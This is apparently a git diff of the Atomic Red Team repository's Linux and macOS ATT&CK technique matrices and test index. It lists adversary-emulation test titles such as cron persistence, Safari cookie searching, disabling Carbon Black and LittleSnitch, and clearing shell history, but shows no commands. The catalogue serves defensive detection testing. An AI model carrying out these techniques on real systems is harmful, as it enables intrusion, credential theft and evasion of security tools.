| [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Local Job Scheduling](./T1168/T1168.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Hidden Files and Directories](./T1158/T1158.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](./T1154/T1154.md) | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Information Discovery](./T1082/T1082.md) | | [Screen Capture](./T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Remote File Copy](./T1105/T1105.md) |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Local Job Scheduling](./T1168/T1168.md) | [Web Shell](./T1100/T1100.md) | [File Deletion](./T1107/T1107.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [File Permissions Modification](./T1222/T1222.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](./T1154/T1154.md) | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [HISTCONTROL](./T1148/T1148.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | | [Hidden Files and Directories](./T1158/T1158.md) | | [System Information Discovery](./T1082/T1082.md) | | [Screen Capture](./T1113/T1113.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Systemd Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Trap](./T1154/T1154.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](./T1130/T1130.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Web Shell](./T1100/T1100.md) | | [Masquerading](./T1036/T1036.md) | | | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | [Remote File Copy](./T1105/T1105.md) |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | [Space after Filename](./T1151/T1151.md) | | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
atomics/macos-index.md
+35 -10
View File
@@ -28,8 +28,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #2: Logon Scripts - Mac [macos]
@@ -52,7 +53,7 @@
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -105,8 +106,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- [T1153 Source](./T1153/T1153.md)
@@ -142,8 +144,10 @@
- [T1119 Automated Collection](./T1119/T1119.md)
- [T1115 Clipboard Data](./T1115/T1115.md)
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
@@ -159,7 +163,7 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
@@ -182,7 +186,6 @@
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
- [T1141 Input Prompt](./T1141/T1141.md)
- Atomic Test #1: Prompt User for Password [macos]
- [T1142 Keychain](./T1142/T1142.md)
- Atomic Test #1: Keychain [macos]
- [T1040 Network Sniffing](./T1040/T1040.md)
@@ -203,10 +206,12 @@
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1089 Disabling Security Tools](./T1089/T1089.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
@@ -220,6 +225,7 @@
- Atomic Test #13: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #14: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #15: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #16: chattr - Remove immutable file attribute [macos, linux]
- [T1144 Gatekeeper Bypass](./T1144/T1144.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- [T1148 HISTCONTROL](./T1148/T1148.md)
@@ -263,12 +269,15 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -283,13 +292,29 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1485 Data Destruction [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -322,5 +347,5 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
atomics/macos-matrix.md
+23 -21
View File
@@ -3,27 +3,29 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Application Window Discovery](./T1010/T1010.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | [File Permissions Modification](./T1222/T1222.md) | [Input Prompt](./T1141/T1141.md) | [Network Sniffing](./T1040/T1040.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | [Launch Agent](./T1159/T1159.md) | [Sudo](./T1169/T1169.md) | [Gatekeeper Bypass](./T1144/T1144.md) | [Keychain](./T1142/T1142.md) | [Password Policy Discovery](./T1201/T1201.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Space after Filename](./T1151/T1151.md) | [Launch Daemon](./T1160/T1160.md) | [Sudo Caching](./T1206/T1206.md) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | | [Input Capture](./T1056/T1056.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | [Private Keys](./T1145/T1145.md) | [Process Discovery](./T1057/T1057.md) | | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Trap](./T1154/T1154.md) | [Local Job Scheduling](./T1168/T1168.md) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](./T1147/T1147.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Logon Scripts](./T1037/T1037.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Information Discovery](./T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Plist Modification](./T1150/T1150.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote File Copy](./T1105/T1105.md) |
| | | [Rc.common](./T1163/T1163.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
